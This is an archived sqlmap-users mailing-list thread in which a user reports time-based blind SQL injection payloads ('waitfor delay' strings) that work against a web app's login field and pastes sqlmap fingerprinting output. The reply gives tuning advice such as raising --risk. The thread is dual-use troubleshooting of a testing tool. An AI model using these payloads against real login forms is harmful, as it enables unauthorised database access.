Hi Chris, Against login forms I generally recommend increasing --risk to 3. In your case the -t traffic.log and -v3 might be of use to debug too.
Bernardo On 22 January 2012 18:18, Chris Oakley <christopher.oak...@gmail.com> wrote: > In fact, don't worry about suggestions for manual syntax, t...@test.com'if 1 > = 1 waitfor delay'0:0:20'-- works so I can work with that. But I wonder why > sqlmap is struggling? Chris > > > On 22 January 2012 18:12, Chris Oakley <christopher.oak...@gmail.com> wrote: >> >> Hi >> >> I've got a web app where the username field of the login form is affected >> by the following string: t...@test.com'waitfor delay'0:0:10'-- as a >> username; i.e. the delay happens, the app is vulnerable. It will always >> then return you to the login screen with an invalid email error, but we >> should still be able to exploit the app using time based methods. Sqlmap >> picks up on this, but then fails at the fingerprinting stage, i.e: >> >> [18:04:03] [INFO] testing MySQL >> [18:04:03] [WARNING] time-based comparison needs larger statistical model. >> Making a few dummy requests, please wait.. >> [18:04:16] [CRITICAL] there is considerable lagging in connection >> response(s). Please use as high value for --time-sec option as p >> ossible (e.g. 10 or more) >> [18:04:16] [WARNING] the back-end DBMS is not MySQL >> [18:04:16] [INFO] testing Oracle >> [18:04:17] [WARNING] it is very important not to stress the network >> adapter's bandwidth during usage of time-based queries >> [18:04:17] [WARNING] the back-end DBMS is not Oracle >> [18:04:17] [INFO] testing PostgreSQL >> [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL >> [18:04:17] [INFO] testing Microsoft SQL Server >> [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server >> [18:04:18] [INFO] testing SQLite >> [18:04:18] [WARNING] the back-end DBMS is not SQLite >> [18:04:18] [INFO] testing Microsoft Access >> [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access >> [18:04:18] [INFO] testing Firebird >> [18:04:19] [WARNING] the back-end DBMS is not Firebird >> [18:04:19] [INFO] testing SAP MaxDB >> [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB >> [18:04:19] [INFO] testing Sybase >> [18:04:19] [WARNING] the back-end DBMS is not Sybase >> [18:04:19] [INFO] testing IBM DB2 >> [18:04:19] [WARNING] the back-end DBMS is not IBM DB2 >> [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end >> database management system. Support for this DBMS will be im >> plemented at some point >> >> I'm not sure why this would be the case, it should be able to find that >> its MS SQL Server. >> >> Any ideas why this might be the case? I can provide more verbose >> information if required, let me know. >> >> In the mean time, any ideas for some more manual injections taking into >> account the syntax of the injection above? I'm going to have a manual play >> now but I thought you might want to know wrt sqlmap. >> >> Cheers >> >> Chris > > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. Homepage: http://about.me/inquis E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) ------------------------------------------------------------------------------ Try before you buy = See our experts in action! The most comprehensive online learning library for Microsoft developers is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, Metro Style Apps, more. Free future releases when you subscribe now! http://p.sf.net/sfu/learndevnow-dev2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
